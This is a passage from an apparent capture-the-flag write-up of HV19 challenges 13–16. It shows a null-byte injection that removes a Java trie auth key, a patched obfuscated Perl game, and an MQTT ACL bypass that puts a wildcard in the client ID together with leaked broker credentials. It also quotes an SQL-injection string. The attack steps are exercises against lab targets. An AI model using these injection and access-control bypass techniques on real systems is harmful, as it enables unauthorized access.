\/>\n<br\/>\n<br\/>The provided zip archive contains the java class <code>NotesBean.java<\/code>:\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">root@kali:~\/hv19\/13# unzip 34913db9-fd2a-43c8-b563-55a1d10ee4cb.zip \nArchive:  34913db9-fd2a-43c8-b563-55a1d10ee4cb.zip\n  inflating: NotesBean.java          \nroot@kali:~\/hv19\/13# cat NotesBean.java <\/pre><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">package com.jwt.jsf.bean;\nimport org.apache.commons.collections4.trie.PatriciaTrie;\n\nimport java.io.IOException;\nimport java.io.InputStream;\nimport java.io.Serializable;\nimport java.io.StringWriter;\n\nimport javax.faces.bean.ManagedBean;\nimport javax.faces.bean.SessionScoped;\nimport static org.apache.commons.lang3.StringEscapeUtils.unescapeJava;\nimport org.apache.commons.io.IOUtils;\n\n@ManagedBean(name=\"notesBean\")\n@SessionScoped\npublic class NotesBean implements Serializable {\n\n\t\/**\n\t * \n\t *\/\n\tprivate PatriciaTrie&lt;Integer&gt; trie = init();\n\tprivate static final long serialVersionUID = 1L;\n\tprivate static final String securitytoken = \"auth_token_4835989\";\n\n\tpublic NotesBean() {\n\t    super();\n\t    init();\n\t}\n\n\tpublic String getTrie() throws IOException {\n\t\tif(isAdmin(trie)) {\n\t\t\tInputStream in=getStreamFromResourcesFolder(\"data\/flag.txt\");\n\t\t\tStringWriter writer = new StringWriter();\n\t\t\tIOUtils.copy(in, writer, \"UTF-8\");\n\t\t\tString flag = writer.toString();\n\n\t\t\treturn flag;\n\t\t}\n\t\treturn \"INTRUSION WILL BE REPORTED!\";\n\t}\n\n\tpublic void setTrie(String note) {\n\t\ttrie.put(unescapeJava(note), 0);\n\t}\n\t\t\n    private static PatriciaTrie&lt;Integer&gt; init(){\n        PatriciaTrie&lt;Integer&gt; trie = new PatriciaTrie&lt;Integer&gt;();\n        trie.put(securitytoken,0);\n\n        return trie;\n    }\n\n    private static boolean isAdmin(PatriciaTrie&lt;Integer&gt; trie){\n        return !trie.containsKey(securitytoken);\n    }\n\n    private static InputStream getStreamFromResourcesFolder(String filePath) {\n    \t  return Thread.currentThread().getContextClassLoader().getResourceAsStream(filePath);\n    \t }\n\n}\n<\/pre>\n<br\/>Let's start by analyzing the code.\n<br\/>\n<br\/>Within the <code>init<\/code> method a <code>PatriciaTrie<\/code> is instantiated and the string (<code>\"auth_token_4835989\"<\/code>) stored in <code>securitytoken<\/code> is added to it, mapped to the value <code>0<\/code>.\n<br\/>\n<br\/>When submitting the text field on the website, the method <code>setTrie<\/code> is probably called, which adds our input to the trie also mapping it to the value <code>0<\/code>.\n<br\/>\n<br\/>The <code>isAdmin<\/code> method determines if we get the flag. The method simply checks if the trie contains the key <code>\"auth_token_4835989\"<\/code> (<code>securitytoken<\/code>). If this is <b>not<\/b> the case, we are admin.\n<br\/>\n<br\/>This means that we somehow have to remove the key <code>\"auth_token_4835989\"<\/code> from the trie to get the flag.\n<br\/>\n<br\/>In order to execute the code locally and test different inputs without touching the webserver, we need to download the required dependencies. In this case we need the following four <code>.jar<\/code> files:\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">root@kali:~\/hv19\/13# ls -al *.jar\n-rw-r--r-- 1 root root  646680 Oct 16  2013 common-lang3.jar\n-rw-rw-rw- 1 root root  751238 Dec  1 18:30 commons-collections4-4.1.jar\n-rw-r--r-- 1 root root  185140 Dec 13 09:20 commons-io-2.4.jar\n-rw-r--r-- 1 root root 2555166 Oct 16  2013 javax.faces.jar\n<\/pre>\n<br\/>Now we can compile the class <code>NotesBean<\/code> (<code>-cp<\/code> sets the classpath):\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">root@kali:~\/hv19\/13# javac -cp '.\/commons-collections4-4.1.jar:.\/javax.faces.jar:.\/commons-io-2.4.jar:.\/common-lang3.jar:.\/' NotesBean.java<\/pre>\n<br\/>In order to instantiate an object of the class <code>NotesBean<\/code>, we add a static <code>main<\/code> method:\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">...\n    public static void main(String args[]) {\n        NotesBean b = new NotesBean();\n    }\n...<\/pre>\n<br\/>To mimic the behavior of the server, we add our input (<code>setTrie<\/code>) and then call the <code>isAdmin<\/code> method:\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">...\n        NotesBean b = new NotesBean();\n        b.setTrie(\"test\");\n        System.out.println(b.getRawTrie());\n\n        if (NotesBean.isAdmin(b.getRawTrie())) System.out.println(\"admin\");\n        else System.out.println(\"nope\");\n...<\/pre>\n<br\/>The added method <code>getRawTrie<\/code> simply returns the <code>PatriciaTrie<\/code> object:\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">...\n\tpublic PatriciaTrie&lt;Integer&gt; getRawTrie() {\n\t\treturn trie;\n\t}\n...<\/pre>\n<br\/>Recompiling and running the class shows the two entries within the trie and that we are obviously no admin, since the <code>\"auth_token_4835989\"<\/code> key is still present:\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">\nroot@kali:~\/hv19\/13# javac -cp '.\/commons-collections4-4.1.jar:.\/javax.faces.jar:.\/commons-io-2.4.jar:.\/common-lang3.jar:.\/' NotesBean.java\nroot@kali:~\/hv19\/13# java -cp '.\/commons-collections4-4.1.jar:.\/javax.faces.jar:.\/commons-io-2.4.jar:.\/common-lang3.jar:.' NotesBean\nTrie[2]={\n  Entry(key=auth_token_4835989 [9], value=0, parent=ROOT, left=ROOT, right=test [11], predecessor=test [11])\n  Entry(key=test [11], value=0, parent=auth_token_4835989 [9], left=auth_token_4835989 [9], right=test [11], predecessor=test [11])\n}\n\nnope<\/pre>\n<br\/>My assumption was that if we are somehow able to remove the key just by adding another key, this key is probably almost the same. So let's fuzz the application by adding another byte to the existing key and adding it:\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">...\n\tfor (byte i = 0; i &lt; 256; i++) {\n\t\tNotesBean b = new NotesBean();\n\t\tbyte[] array = {i};\n\t\tString s = new String(array);\n\t\tb.setTrie(\"auth_token_4835989\"+s);\n\t\tSystem.out.println(b.getRawTrie());\n\n\t\tif (NotesBean.isAdmin(b.getRawTrie())) {\n\t\t\tSystem.out.println(i);\n\t\t\tSystem.out.println(\"admin\");\n\t\t\treturn;\n\t\t}\n\t\telse System.out.println(\"nope\");\n\t}\n...<\/pre>\n<br\/>Recompiling and running the code:\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">root@kali:~\/hv19\/13# ...\nTrie[1]={\n  Entry(key=auth_token_4835989 [9], value=0, parent=ROOT, left=ROOT, right=auth_token_4835989 [9], predecessor=auth_token_4835989 [9])\n}\n\n0\nadmin\n<\/pre>\n<br\/>Wait, what?\n<br\/>\n<br\/>We actually got a hit right at byte <code>0x00<\/code>. As we can see the trie now only contains one key instead of two. And this key seems to be the string <code>\"auth_token_4835989\\x00\"<\/code>. The key <code>\"auth_token_4835989\"<\/code> was probably overwritten by our entry, since a part of the code did honor the null byte and another part did not honor it.\n<br\/>\n<br\/>Now we only need to carry out our attack against the real webserver. In order to do this we can fire up burp, enter the string <code>\"auth_token_4835989\"<\/code> and add a null byte (<code>%00<\/code>) in the intercepted request:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/13_02_auth.png\" \/>\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/13_03_burp.png\" \/>\n<br\/>\n<br\/>And we actually get the flag:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/13_04_flag.png\" \/>\n<br\/>\n<br\/>The flag is <span class=\"spanFlag\">HV19{get_th3_chocolateZ}<\/span>.\n<br\/><br\/>\n<hr id=\"chlgHV19.14\"\/><span style=\"float:right;\"><a href=\"\">return to overview &#x21E7;<\/a><\/span><h1>HV19.14 - Achtung&nbsp;das&nbsp;Flag<\/h1>\n<table class=\"chlgTable\"><tbody><tr><td width=\"130\"><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/ball_14.png\" \/><\/td><td style=\"color:#333333\">Author: M. (who else)<\/td><\/tr><tr><td colspan=\"2\">Let's play another little game this year. Once again, I promise it is hardly obfuscated.\n<br\/>\n<br\/><pre>use Tk;use MIME::Base64;chomp(($a,$a,$b,$c,$f,$u,$z,$y,$r,$r,$u)=<DATA>);sub M{$M=shift;##\n<br\/>@m=keys %::;(grep{(unpack(\"%32W*\",$_).length($_))eq$M}@m)[0]};$zvYPxUpXMSsw=0x1337C0DE;###\n<br\/>\/_help_me_\/;$PMMtQJOcHm8eFQfdsdNAS20=sub{$zvYPxUpXMSsw=($zvYPxUpXMSsw*16807)&0xFFFFFFFF;};\n<br\/>($a1Ivn0ECw49I5I0oE0='07&3-\"11*\/(')=~y$!-=$`-~$;($Sk61A7pO='K&:P3&44')=~y$!-=$`-~$;m\/Mm\/g;\n<br\/>($sk6i47pO='K&:R&-&\"4&')=~y$!-=$`-~$;;;;$d28Vt03MEbdY0=sub{pack('n',$fff[$S9cXJIGB0BWce++]\n<br\/>^($PMMtQJOcHm8eFQfdsdNAS20->()&0xDEAD));};'42';($vgOjwRk4wIo7_=MainWindow->new)->title($r)\n<br\/>;($vMnyQdAkfgIIik=$vgOjwRk4wIo7_->Canvas(\"-$a\"=>640,\"-$b\"=>480,\"-$u\"=>$f))->pack;@p=(42,42\n<br\/>);$cqI=$vMnyQdAkfgIIik->createLine(@p,@p,\"-$y\"=>$c,\"-$a\"=>3);;;$S9cXJIGB0BWce=0;$_2kY10=0;\n<br\/>$_8NZQooI5K4b=0;$Sk6lA7p0=0;$MMM__;$_=M(120812).'\/'.M(191323).M(133418).M(98813).M(121913)\n<br\/>.M(134214).M(101213).'\/'.M(97312).M(6328).M(2853).'+'.M(4386);s|_||gi;@fff=map{unpack('n',\n<br\/>$::{M(122413)}->($_))}m:...:g;($T=sub{$vMnyQdAkfgIIik->delete($t);$t=$vMnyQdAkfgIIik->#FOO\n<br\/>createText($PMMtQJOcHm8eFQfdsdNAS20->()%600+20,$PMMtQJOcHm8eFQfdsdNAS20->()%440+20,#Perl!!\n<br\/>\"-text\"=>$d28Vt03MEbdY0->(),\"-$y\"=>$z);})->();$HACK;$i=$vMnyQdAkfgIIik->repeat(25,sub{$_=(\n<br\/>$_8NZQooI5K4b+=0.1*$Sk6lA7p0);;$p[0]+=3.0*cos;$p[1]-=3*sin;;($p[0]>1&&$p[1]>1&&$p[0]<639&#038;&#038;\n<br\/>$p[1]<479)||$i->cancel();00;$q=($vMnyQdAkfgIIik->find($a1Ivn0ECw49I5I0oE0,$p[0]-1,$p[1]-1,\n<br\/>$p[0]+1,$p[1]+1)||[])->[0];$q==$t&&$T->();$vMnyQdAkfgIIik->insert($cqI,'end',\\@p);($q==###\n<br\/>$cqI||$S9cXJIGB0BWce>44)&&$i->cancel();});$KE=5;$vgOjwRk4wIo7_->bind(\"<$Sk61A7pO-n>\"=>sub{\n<br\/>$Sk6lA7p0=1;});$vgOjwRk4wIo7_->bind(\"<$Sk61A7pO-m>\"=>sub{$Sk6lA7p0=-1;});$vgOjwRk4wIo7_#%\"\n<br\/>->bind(\"<$sk6i47pO-n>\"=>sub{$Sk6lA7p0=0 if$Sk6lA7p0>0;});$vgOjwRk4wIo7_->bind(\"<$sk6i47pO\"\n<br\/>.\"-m>\"=>sub{$Sk6lA7p0=0 if $Sk6lA7p0<0;});$::{M(7998)}->();$M_decrypt=sub{'HACKVENT2019'};\n<br\/>__DATA__\n<br\/>The cake is a lie!\n<br\/>width\n<br\/>height\n<br\/>orange\n<br\/>black\n<br\/>green\n<br\/>cyan\n<br\/>fill\n<br\/>Only perl can parse Perl!\n<br\/>Achtung das Flag! --> Use N and M\n<br\/>background\n<br\/>M'); DROP TABLE flags; -- \n<br\/>Run me in Perl!\n<br\/>__DATA__<\/pre><\/td><\/tr><\/tbody><\/table>\n<br\/>The obfuscated perl script is a little snake-style game, where we can collect each part of the flag 2 characters a time. If we hit ourself or an outer boarder, the game stops:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/14_01_snake.png\" \/>\n<br\/>\n<br\/>At first let's use an <a href=\"https:\/\/www.tutorialspoint.com\/online_perl_formatter.htm\" rel=\"noopener noreferrer\" target=\"_blank\">online formatter<\/a> to beautify the code:\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">use Tk;\nuse MIME::Base64;\nchomp( ( $a, $a, $b, $c, $f, $u, $z, $y, $r, $r, $u ) = &lt;DATA&gt; );\n\nsub M {\n    $M = shift;\n    @m = keys %::;\n    ( grep { ( unpack( \"%32W*\", $_ ) . length($_) ) eq $M } @m )[0];\n}\n$zvYPxUpXMSsw = 0x1337C0DE;\n\/_help_me_\/;\n$PMMtQJOcHm8eFQfdsdNAS20 =\n  sub { $zvYPxUpXMSsw = ( $zvYPxUpXMSsw * 16807 ) & 0xFFFFFFFF; };\n( $a1Ivn0ECw49I5I0oE0 = '07&3-\"11*\/(' ) =~ y$!-=$`-~$;\n( $Sk61A7pO           = 'K&:P3&44' ) =~ y$!-=$`-~$;\nm\/Mm\/g;\n( $sk6i47pO = 'K&:R&-&\"4&' ) =~ y$!-=$`-~$;\n$d28Vt03MEbdY0 = sub {\n    pack( 'n',\n        $fff[ $S9cXJIGB0BWce++ ] ^ ( $PMMtQJOcHm8eFQfdsdNAS20-&gt;() & 0xDEAD ) );\n};\n'42';\n( $vgOjwRk4wIo7_ = MainWindow-&gt;new )-&gt;title($r);\n( $vMnyQdAkfgIIik =\n      $vgOjwRk4wIo7_-&gt;Canvas( \"-$a\" =&gt; 640, \"-$b\" =&gt; 480, \"-$u\" =&gt; $f ) )-&gt;pack;\n@p = ( 42, 42 );\n$cqI           = $vMnyQdAkfgIIik-&gt;createLine( @p, @p, \"-$y\" =&gt; $c, \"-$a\" =&gt; 3 );\n$S9cXJIGB0BWce = 0;\n$_2kY10        = 0;\n$_8NZQooI5K4b  = 0;\n$Sk6lA7p0      = 0;\n$MMM__;\n$_ =\n    M(120812) . '\/'\n  . M(191323)\n  . M(133418)\n  . M(98813)\n  . M(121913)\n  . M(134214)\n  . M(101213) . '\/'\n  . M(97312)\n  . M(6328)\n  . M(2853) . '+'\n  . M(4386);\ns|_||gi;\n@fff = map { unpack( 'n', $::{ M(122413) }-&gt;($_) ) } m:...:g;\n(\n    $T = sub {\n        $vMnyQdAkfgIIik-&gt;delete($t);\n        $t = $vMnyQdAkfgIIik-&gt;createText(\n            $PMMtQJOcHm8eFQfdsdNAS20-&gt;() % 600 + 20,\n            $PMMtQJOcHm8eFQfdsdNAS20-&gt;() % 440 + 20,\n            \"-text\" =&gt; $d28Vt03MEbdY0-&gt;(),\n            \"-$y\"   =&gt; $z\n        );\n    }\n)-&gt;();\n$HACK;\n$i = $vMnyQdAkfgIIik-&gt;repeat(\n    25,\n    sub {\n        $_ = ( $_8NZQooI5K4b += 0.1 * $Sk6lA7p0 );\n        $p[0] += 3.0 * cos;\n        $p[1] -= 3 * sin;\n        ( $p[0] &gt; 1 && $p[1] &gt; 1 && $p[0] &lt; 639 && $p[1] &lt; 479 )\n          || $i-&gt;cancel();\n        00;\n        $q = (\n            $vMnyQdAkfgIIik-&gt;find(\n                $a1Ivn0ECw49I5I0oE0,\n                $p[0] - 1,\n                $p[1] - 1,\n                $p[0] + 1,\n                $p[1] + 1\n              )\n              || []\n        )-&gt;[0];\n        $q == $t && $T-&gt;();\n        $vMnyQdAkfgIIik-&gt;insert( $cqI, 'end', \\@p );\n        ( $q == $cqI || $S9cXJIGB0BWce &gt; 44 ) && $i-&gt;cancel();\n    }\n);\n$KE = 5;\n$vgOjwRk4wIo7_-&gt;bind(\n    \"&lt;$Sk61A7pO-n&gt;\" =&gt; sub {\n        $Sk6lA7p0 = 1;\n    }\n);\n$vgOjwRk4wIo7_-&gt;bind( \"&lt;$Sk61A7pO-m&gt;\" =&gt; sub { $Sk6lA7p0 = -1; } );\n$vgOjwRk4wIo7_-&gt;bind( \"&lt;$sk6i47pO-n&gt;\" =&gt; sub { $Sk6lA7p0 = 0 if $Sk6lA7p0 &gt; 0; }\n);\n$vgOjwRk4wIo7_-&gt;bind(\n    \"&lt;$sk6i47pO\" . \"-m&gt;\" =&gt; sub { $Sk6lA7p0 = 0 if $Sk6lA7p0 &lt; 0; } );\n$::{ M(7998) }-&gt;();\n$M_decrypt = sub { 'HACKVENT2019' };\n__DATA__\nThe cake is a lie!\nwidth\nheight\norange\nblack\ngreen\ncyan\nfill\nOnly perl can parse Perl!\nAchtung das Flag! --&gt; Use N and M\nbackground\nM'); DROP TABLE flags; -- \nRun me in Perl!\n__DATA__\n<\/pre>\n<br\/>After changing the code a little bit to get familiar with it, we can follow different approaches.\n<br\/>\n<br\/>One approach would be to simply remove the calls to <code>cancel()<\/code>:\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">...\n        ( $p[0] &gt; 1 && $p[1] &gt; 1 && $p[0] &lt; 639 && $p[1] &lt; 479 )\n          || $i-&gt;cancel();\n        00;\n...\n        ( $q == $cqI || $S9cXJIGB0BWce &gt; 44 ) && $i-&gt;cancel();\n...<\/pre>\n<br\/>This way we game does not stop even if we hit ourself or a boarder. Though it is quite tiring to collect all parts of the flag manually, since the flag seems to be very long.\n<br\/>\n<br\/>After understanding the code even better, we can increase the game tick time by editing the following <code>25<\/code> to eg. <code>2500<\/code>:\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">...\n$i = $vMnyQdAkfgIIik-&gt;repeat(\n    25,\n    sub {\n...\n<\/pre>\n<br\/>Also we want to edit the following line:\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">...\n        $q == $t && $T-&gt;();\n...\n<\/pre>\n<br\/><code>$T->()<\/code> is called in order to move to the next part of the flag. If we skip the condition before it and just call <code>$T->()<\/code>, the program kindly prints each part of the flag out one after another. We only have to note down the characters.\n<br\/>\n<br\/>It is even more comfortable, if we additionally carry out the following adjustment:\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">...\n    $T = sub {\n        $vMnyQdAkfgIIik-&gt;delete($t);\n        $w = $PMMtQJOcHm8eFQfdsdNAS20-&gt;() % 600 + 20; # added\n        $h = $PMMtQJOcHm8eFQfdsdNAS20-&gt;() % 440 + 20; # added\n        $txt = $d28Vt03MEbdY0-&gt;(); # added\n        $t = $vMnyQdAkfgIIik-&gt;createText(\n            $w,#$PMMtQJOcHm8eFQfdsdNAS20-&gt;() % 600 + 20,\n            $h,#$PMMtQJOcHm8eFQfdsdNAS20-&gt;() % 440 + 20,\n            \"-text\" =&gt; $txt,#$d28Vt03MEbdY0-&gt;(),\n            \"-$y\"   =&gt; $z\n        );\n        print($txt); # added\n    }\n...<\/pre>\n<br\/>This way the flag gets printed out in the console. Ensure that the two calls determining the position of the text (<code>$PMMtQJOcHm8eFQfdsdNAS20->()<\/code>) are before the call to get the actual text (<code>$d28Vt03MEbdY0->()<\/code>).\n<br\/>\n<br\/>The flag is <span class=\"spanFlag\">HV19{s@@jSfx4gPcvtiwxPCagrtQ@,y^p-za-oPQ^a-z\\x20\\n^&&s[(.)(..)][\\2\\1]g;s%4(...)%\"p$1t\"%ee}<\/span>.\n<br\/><br\/>\n<hr id=\"chlgHV19.15\"\/><span style=\"float:right;\"><a href=\"\">return to overview &#x21E7;<\/a><\/span><h1>HV19.15 - Santa's&nbsp;Workshop<\/h1>\n<table class=\"chlgTable\"><tbody><tr><td width=\"130\"><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/ball_15.png\" \/><\/td><td style=\"color:#333333\">Author: inik & avarx<\/td><\/tr><tr><td colspan=\"2\">The Elves are working very hard.\n<br\/>Look at <span class=\"link\">http:\/\/whale.hacking-lab.com:2080\/<\/span> to see how busy they are.<\/td><\/tr><\/tbody><\/table>\n<br\/>The provided link leads to a website showing how much gifts the elves have built yet:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/15_01_gifts.png\" width=\"700x\"\/>\n<br\/>\n<br\/>The number is constantly increasing.\n<br\/>\n<br\/>By inspecting the source code, we can see that the website is using <a href=\"https:\/\/en.wikipedia.org\/wiki\/MQTT\" rel=\"noopener noreferrer\" target=\"_blank\">MQTT<\/a> via websockets to retrieve the amount of gifts built.\n<br\/>\n<br\/>The file <code>config.js<\/code> contains the configuration used:\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">var mqtt;\nvar reconnectTimeout = 100;\nvar host = 'whale.hacking-lab.com';\nvar port = 9001;\nvar useTLS = false;\nvar username = 'workshop';\nvar password = '2fXc7AWINBXyruvKLiX';\nvar clientid = localStorage.getItem(\"clientid\");\nif (clientid == null) {\n  clientid = ('' + (Math.round(Math.random() * 1000000000000000))).padStart(16, '0');\n  localStorage.setItem(\"clientid\", clientid);\n}\nvar topic = 'HV19\/gifts\/'+clientid;\n\/\/ var topic = 'HV19\/gifts\/'+clientid+'\/flag-tbd';\nvar cleansession = true;<\/pre>\n<br\/>Accordingly the amount of gifts built can be retrieved by querying the topic <code>'HV19\/gifts\/'+clientid<\/code>. The flag seems to be retrievable through a subtopic: <code>'HV19\/gifts\/'+clientid+'\/flag-tbd'<\/code>.\n<br\/>\n<br\/>We can use the configuration within a python script to retrieve the amount of gifts built using the <a href=\"https:\/\/pypi.org\/project\/paho-mqtt\/\" rel=\"noopener noreferrer\" target=\"_blank\">paho-mqtt python module<\/a>:\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">#!\/usr\/bin\/env python3\n\nimport paho.mqtt.client as mqtt\n\ndef on_connect(client, userdata, flags, rc):\n    print('connected')\n    client.subscribe('#')\n\ndef on_message(client, userdata, msg):\n    print('['+msg.topic+']')\n    print(msg.payload)\n\nclient = mqtt.Client(client_id='03133731337',transport=\"websockets\")\nclient.username_pw_set('workshop', '2fXc7AWINBXyruvKLiX')\nclient.on_connect = on_connect\nclient.on_message = on_message\nclient.connect('whale.hacking-lab.com', 9001, 60)\nclient.loop_forever()<\/pre>\n<br\/>For the <code>client_id<\/code> we can choose any random value. By using the wildcard <code>#<\/code> within the subscription, we subscribe to all topics we have access to (in this case only the amount of gifts built).\n<br\/>\n<br\/>Running the script retrieves the amount of gifts built:\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">root@kali:~\/hv19\/15# .\/getGifts.py\nconnected\n[HV19\/gifts\/03133731337]\nb'7347537'\n[HV19\/gifts\/03133731337]\nb'7347538'\n[HV19\/gifts\/03133731337]\nb'7347541'\n...<\/pre>\n<br\/>MQTT provides special system message, which aren't automatically registered by subscribing to the wildcard <code>#<\/code>. In order to get this system message, we must subscribe to <code>$SYS\/#<\/code>:\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">...\n    client.subscribe('$SYS\/#')\n...<\/pre>\n<br\/>The system message <code>$SYS\/broker\/version<\/code> provides a hint:\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">root@kali:~\/hv19\/15# .\/getSysMessages.py\nconnected\n[$SYS\/broker\/version]\nb'mosquitto version 1.4.11 (We elves are super-smart and know about CVE-2017-7650 and the POC. So we made a genious fix you never will be able to pass. Hohoho)'<\/pre>\n<br\/>The mentioned <a href=\"https:\/\/bugs.eclipse.org\/bugs\/show_bug.cgi?id=516765\" rel=\"noopener noreferrer\" target=\"_blank\">CVE-2017-7650<\/a> regards pattern based ACLs. <a href=\"https:\/\/bugs.eclipse.org\/bugs\/attachment.cgi?id=268603&#038;action=diff\" rel=\"noopener noreferrer\" target=\"_blank\">The fix for the CVE<\/a> filters the characters <code>+<\/code>, <code>#<\/code> and <code>\/<\/code> within the client ID as well as the username since these characters have a special meaning within a topic. A pattern based ACL can contain identifiers eg. for the client ID by using the identifer <code>%c<\/code>, which is replaced with the current client ID. If this client ID contains a mentioned special character the semantic of the ACL may change.\n<br\/>\n<br\/>Since the topic, at which we can retrieve the amount of gifts built, contains our client ID, the ACL in place probably looks like this:\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">pattern read HV19\/gifts\/%c<\/pre>\n<br\/>The official patch linked above revokes any of the characters <code>+#\/<\/code> within the client ID and username. As stated within the hint, the elves implemented their own patch. By trying different client IDs we can figure out, that the characters <code>#<\/code> and <code>+<\/code> are only restricted if used within the first character of the client ID. If we use the client ID <code>\"xyz\/#\"<\/code> the parsed pattern based ACL would look like this:\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">pattern read HV19\/gifts\/xyz\/#<\/pre>\n<br\/>Accordingly we would have access to all topics beneath <code>HV19\/gifts\/xyz\/...<\/code> including the flag.\n<br\/>\n<br\/>So let's give it a shot using our previously used client ID (the id has to be used once before):\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">...\nclient = mqtt.Client(client_id='03133731337\/#',transport=\"websockets\")\n...<\/pre>\n<br\/>Running the script actually reveals the flag, whichs is placed within the topic's name:\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">root@kali:~\/hv19\/15# .\/getFlag.py\nconnected\n[HV19\/gifts\/03133731337\/HV19{N0_1nput_v4l1d4t10n_3qu4ls_d1s4st3r}]\nb'Congrats, you got it. The elves should not overrate their smartness!!!'<\/pre>\n<br\/>The flag is <span class=\"spanFlag\">HV19{N0_1nput_v4l1d4t10n_3qu4ls_d1s4st3r}<\/span>.\n<br\/><br\/>\n<hr id=\"chlgHV19.16\"\/><span style=\"float:right;\"><a href=\"\">return to overview &#x21E7;<\/a><\/span><h1>HV19.16 - B0rked&nbsp;Calculator<\/h1>\n<table class=\"chlgTable\"><tbody><tr><td width=\"130\"><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/ball_16.png\" \/><\/td><td style=\"color:#333333\">Author: hardlock<\/td><\/tr><tr><td colspan=\"2\">Santa has coded a simple project for you, but sadly he removed all the operations.\n<br\/>But when you restore them it will print the flag!\n<br\/>\n<br\/><span class=\"link\">HV19.16-b0rked.zip<\/span><\/td><\/tr><\/tbody><\/table>\n<br\/>The provided zip archive contains a 32-bit PE binary:\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">root@kali:~\/hv19\/16# unzip 9b90c573-d530-401b-b3f8-24454bbf015e.zip \nArchive:  9b90c573-d530-401b-b3f8-24454bbf015e.zip\n  inflating: b0rked.exe              \nroot@kali:~\/hv19\/16# file b0rked.exe \nb0rked.exe: PE32 executable (GUI) Intel 80386, for MS Windows<\/pre>\n<br\/>So let's boot up a windows machine and have a look at it. The calculator allows us to enter two numbers and an operation (<code>+<\/code>, <code>-<\/code>, <code>*<\/code> and <code>\/<\/code>):\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/16_01_calc.png\" \/>\n<br\/>\n<br\/>As already stated within the description the actual implementation of the operations has been removed. Beneath the input fields some obviously messed up text is displayed. This is probably the flag, which will be displayed correctly if we implement the removed operations.\n<br\/>\n<br\/>Let's have a look at the disassembly of the binary using <code>x64dbg<\/code>:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/16_02_ops.png\" width=\"900px\"\/>\n<br\/>\n<br\/>The above part of the disassembly shows the conditional calls to the appropriate function based on the selected operation.\n<br\/>\n<br\/>When we inspect the disassembly of these functions, we can see that the implementation has been purged with <code>nops<\/code> (<code>0x90<\/code>):\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/16_03_placeholder.png\" width=\"900px\"\/>\n<br\/>\n<br\/>Accordingly our task is to replace the <code>nops<\/code> with the appropriate implementation in order to get the flag printed correctly.\n<br\/>\n<br\/>The first operation is add (<code>+<\/code>):\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">enter 0,0\nmov eax,dword ptr ss:[ebp+8]\nnop \nnop \nnop \nleave \nret 8\n<\/pre>\n<br\/>The author kindly left a starting point by not removing the first relevant instruction: <code>mov eax,dword ptr ss:[ebp+8]<\/code>. By setting a 